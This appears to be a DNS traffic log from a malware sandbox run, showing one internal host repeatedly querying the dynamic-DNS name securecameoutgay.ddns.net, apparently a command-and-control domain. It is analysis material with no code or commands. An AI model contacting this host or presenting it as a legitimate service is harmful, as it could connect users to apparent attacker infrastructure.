                                                    Oct 12, 2024 23:05:38.082293987 CEST192.168.2.148.8.8.80x717fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.088897943 CEST192.168.2.148.8.8.80x717fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.095259905 CEST192.168.2.148.8.8.80x276bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.101892948 CEST192.168.2.148.8.8.80x276bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.108405113 CEST192.168.2.148.8.8.80x276bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.115072012 CEST192.168.2.148.8.8.80x276bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.122092962 CEST192.168.2.148.8.8.80x276bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.128782988 CEST192.168.2.148.8.8.80x7ed9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.135370016 CEST192.168.2.148.8.8.80x7ed9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.142421961 CEST192.168.2.148.8.8.80x7ed9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.149084091 CEST192.168.2.148.8.8.80x7ed9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.155939102 CEST192.168.2.148.8.8.80x7ed9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.162779093 CEST192.168.2.148.8.8.80x5388Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.169640064 CEST192.168.2.148.8.8.80x5388Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.176152945 CEST192.168.2.148.8.8.80x5388Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.182799101 CEST192.168.2.148.8.8.80x5388Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.189832926 CEST192.168.2.148.8.8.80x5388Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.196521997 CEST192.168.2.148.8.8.80x8606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.203114986 CEST192.168.2.148.8.8.80x8606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.209749937 CEST192.168.2.148.8.8.80x8606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.216211081 CEST192.168.2.148.8.8.80x8606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.222517014 CEST192.168.2.148.8.8.80x8606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.229162931 CEST192.168.2.148.8.8.80x6458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.235924006 CEST192.168.2.148.8.8.80x6458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.242835999 CEST192.168.2.148.8.8.80x6458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.249316931 CEST192.168.2.148.8.8.80x6458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.255857944 CEST192.168.2.148.8.8.80x6458Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.262516975 CEST192.168.2.148.8.8.80x262cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.269275904 CEST192.168.2.148.8.8.80x262cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.275849104 CEST192.168.2.148.8.8.80x262cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.282495975 CEST192.168.2.148.8.8.80x262cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.289253950 CEST192.168.2.148.8.8.80x262cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.296247959 CEST192.168.2.148.8.8.80x6b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.303185940 CEST192.168.2.148.8.8.80x6b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.310400963 CEST192.168.2.148.8.8.80x6b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.316978931 CEST192.168.2.148.8.8.80x6b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.323990107 CEST192.168.2.148.8.8.80x6b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.330821991 CEST192.168.2.148.8.8.80x9344Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.337434053 CEST192.168.2.148.8.8.80x9344Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.344274998 CEST192.168.2.148.8.8.80x9344Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.351011992 CEST192.168.2.148.8.8.80x9344Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.358201981 CEST192.168.2.148.8.8.80x9344Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.365053892 CEST192.168.2.148.8.8.80xfa96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.371717930 CEST192.168.2.148.8.8.80xfa96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.378505945 CEST192.168.2.148.8.8.80xfa96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.385377884 CEST192.168.2.148.8.8.80xfa96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.392083883 CEST192.168.2.148.8.8.80xfa96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.398689985 CEST192.168.2.148.8.8.80x680bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.405198097 CEST192.168.2.148.8.8.80x680bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.411982059 CEST192.168.2.148.8.8.80x680bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.418565035 CEST192.168.2.148.8.8.80x680bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.424982071 CEST192.168.2.148.8.8.80x680bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.431602001 CEST192.168.2.148.8.8.80x90d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.438003063 CEST192.168.2.148.8.8.80x90d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.444406033 CEST192.168.2.148.8.8.80x90d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.454116106 CEST192.168.2.148.8.8.80x90d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.460561991 CEST192.168.2.148.8.8.80x90d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.467446089 CEST192.168.2.148.8.8.80x256fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.474533081 CEST192.168.2.148.8.8.80x256fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.481355906 CEST192.168.2.148.8.8.80x256fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.488102913 CEST192.168.2.148.8.8.80x256fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.494607925 CEST192.168.2.148.8.8.80x256fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.501355886 CEST192.168.2.148.8.8.80x1d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.508452892 CEST192.168.2.148.8.8.80x1d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.515072107 CEST192.168.2.148.8.8.80x1d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.521918058 CEST192.168.2.148.8.8.80x1d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.528943062 CEST192.168.2.148.8.8.80x1d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.535722017 CEST192.168.2.148.8.8.80xb2a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.542299032 CEST192.168.2.148.8.8.80xb2a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.549043894 CEST192.168.2.148.8.8.80xb2a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.555577040 CEST192.168.2.148.8.8.80xb2a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.562170029 CEST192.168.2.148.8.8.80xb2a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.568878889 CEST192.168.2.148.8.8.80xd752Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.575603962 CEST192.168.2.148.8.8.80xd752Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.582250118 CEST192.168.2.148.8.8.80xd752Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.588848114 CEST192.168.2.148.8.8.80xd752Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.595535040 CEST192.168.2.148.8.8.80xd752Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.602333069 CEST192.168.2.148.8.8.80xdcb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.609040022 CEST192.168.2.148.8.8.80xdcb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.615569115 CEST192.168.2.148.8.8.80xdcb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.622303009 CEST192.168.2.148.8.8.80xdcb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.628926039 CEST192.168.2.148.8.8.80xdcb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.635735989 CEST192.168.2.148.8.8.80x1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.642678022 CEST192.168.2.148.8.8.80x1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.649426937 CEST192.168.2.148.8.8.80x1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.656389952 CEST192.168.2.148.8.8.80x1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.662995100 CEST192.168.2.148.8.8.80x1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.669672012 CEST192.168.2.148.8.8.80xb103Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.676306963 CEST192.168.2.148.8.8.80xb103Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.682727098 CEST192.168.2.148.8.8.80xb103Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.689414024 CEST192.168.2.148.8.8.80xb103Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.696607113 CEST192.168.2.148.8.8.80xb103Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.703450918 CEST192.168.2.148.8.8.80xc8a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.710191011 CEST192.168.2.148.8.8.80xc8a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.717154026 CEST192.168.2.148.8.8.80xc8a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.724025965 CEST192.168.2.148.8.8.80xc8a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.730712891 CEST192.168.2.148.8.8.80xc8a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.737401009 CEST192.168.2.148.8.8.80xc531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.744116068 CEST192.168.2.148.8.8.80xc531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.750875950 CEST192.168.2.148.8.8.80xc531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.757438898 CEST192.168.2.148.8.8.80xc531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.764105082 CEST192.168.2.148.8.8.80xc531Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.770596981 CEST192.168.2.148.8.8.80x99d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.777257919 CEST192.168.2.148.8.8.80x99d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.784310102 CEST192.168.2.148.8.8.80x99d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.790873051 CEST192.168.2.148.8.8.80x99d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.797364950 CEST192.168.2.148.8.8.80x99d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.804502010 CEST192.168.2.148.8.8.80x33f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.811476946 CEST192.168.2.148.8.8.80x33f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.818315983 CEST192.168.2.148.8.8.80x33f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.825191021 CEST192.168.2.148.8.8.80x33f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.831743956 CEST192.168.2.148.8.8.80x33f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.838258982 CEST192.168.2.148.8.8.80xfa24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.845041990 CEST192.168.2.148.8.8.80xfa24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.851675987 CEST192.168.2.148.8.8.80xfa24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.858445883 CEST192.168.2.148.8.8.80xfa24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.865756035 CEST192.168.2.148.8.8.80xfa24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.872190952 CEST192.168.2.148.8.8.80x2cb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.878622055 CEST192.168.2.148.8.8.80x2cb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.884947062 CEST192.168.2.148.8.8.80x2cb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.891608000 CEST192.168.2.148.8.8.80x2cb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.898199081 CEST192.168.2.148.8.8.80x2cb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.904954910 CEST192.168.2.148.8.8.80x4154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.911866903 CEST192.168.2.148.8.8.80x4154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.918225050 CEST192.168.2.148.8.8.80x4154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.924618006 CEST192.168.2.148.8.8.80x4154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.931538105 CEST192.168.2.148.8.8.80x4154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.938502073 CEST192.168.2.148.8.8.80xaa09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.945019007 CEST192.168.2.148.8.8.80xaa09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.951762915 CEST192.168.2.148.8.8.80xaa09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.958523035 CEST192.168.2.148.8.8.80xaa09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.965341091 CEST192.168.2.148.8.8.80xaa09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.972028017 CEST192.168.2.148.8.8.80xe55bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.978729010 CEST192.168.2.148.8.8.80xe55bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.985358000 CEST192.168.2.148.8.8.80xe55bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.991605043 CEST192.168.2.148.8.8.80xe55bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.997966051 CEST192.168.2.148.8.8.80xe55bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.005383015 CEST192.168.2.148.8.8.80x6f79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.011889935 CEST192.168.2.148.8.8.80x6f79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.018774033 CEST192.168.2.148.8.8.80x6f79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.025707006 CEST192.168.2.148.8.8.80x6f79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.032464981 CEST192.168.2.148.8.8.80x6f79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.038810015 CEST192.168.2.148.8.8.80x6627Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.045557022 CEST192.168.2.148.8.8.80x6627Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.052268028 CEST192.168.2.148.8.8.80x6627Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.059040070 CEST192.168.2.148.8.8.80x6627Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.065857887 CEST192.168.2.148.8.8.80x6627Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.072730064 CEST192.168.2.148.8.8.80x517bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.079323053 CEST192.168.2.148.8.8.80x517bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.086044073 CEST192.168.2.148.8.8.80x517bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.092900991 CEST192.168.2.148.8.8.80x517bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.099476099 CEST192.168.2.148.8.8.80x517bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.106347084 CEST192.168.2.148.8.8.80xeef1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.113370895 CEST192.168.2.148.8.8.80xeef1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.119940996 CEST192.168.2.148.8.8.80xeef1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.126703978 CEST192.168.2.148.8.8.80xeef1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.133317947 CEST192.168.2.148.8.8.80xeef1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.139767885 CEST192.168.2.148.8.8.80xdbbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.146179914 CEST192.168.2.148.8.8.80xdbbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.152626038 CEST192.168.2.148.8.8.80xdbbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.159234047 CEST192.168.2.148.8.8.80xdbbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.166140079 CEST192.168.2.148.8.8.80xdbbeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.172733068 CEST192.168.2.148.8.8.80x82bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.179471016 CEST192.168.2.148.8.8.80x82bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.186708927 CEST192.168.2.148.8.8.80x82bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.193701029 CEST192.168.2.148.8.8.80x82bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.200277090 CEST192.168.2.148.8.8.80x82bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.207048893 CEST192.168.2.148.8.8.80x67e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.213537931 CEST192.168.2.148.8.8.80x67e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.220391035 CEST192.168.2.148.8.8.80x67e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.227411032 CEST192.168.2.148.8.8.80x67e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.234142065 CEST192.168.2.148.8.8.80x67e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.240876913 CEST192.168.2.148.8.8.80xbcf0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.247550964 CEST192.168.2.148.8.8.80xbcf0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.253963947 CEST192.168.2.148.8.8.80xbcf0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.260489941 CEST192.168.2.148.8.8.80xbcf0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.267110109 CEST192.168.2.148.8.8.80xbcf0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.273880005 CEST192.168.2.148.8.8.80xc253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.280694008 CEST192.168.2.148.8.8.80xc253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.287878990 CEST192.168.2.148.8.8.80xc253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.295464993 CEST192.168.2.148.8.8.80xc253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.302524090 CEST192.168.2.148.8.8.80xc253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.309519053 CEST192.168.2.148.8.8.80x2460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.316133976 CEST192.168.2.148.8.8.80x2460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.323201895 CEST192.168.2.148.8.8.80x2460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.329696894 CEST192.168.2.148.8.8.80x2460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.336827993 CEST192.168.2.148.8.8.80x2460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.343719959 CEST192.168.2.148.8.8.80x824Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
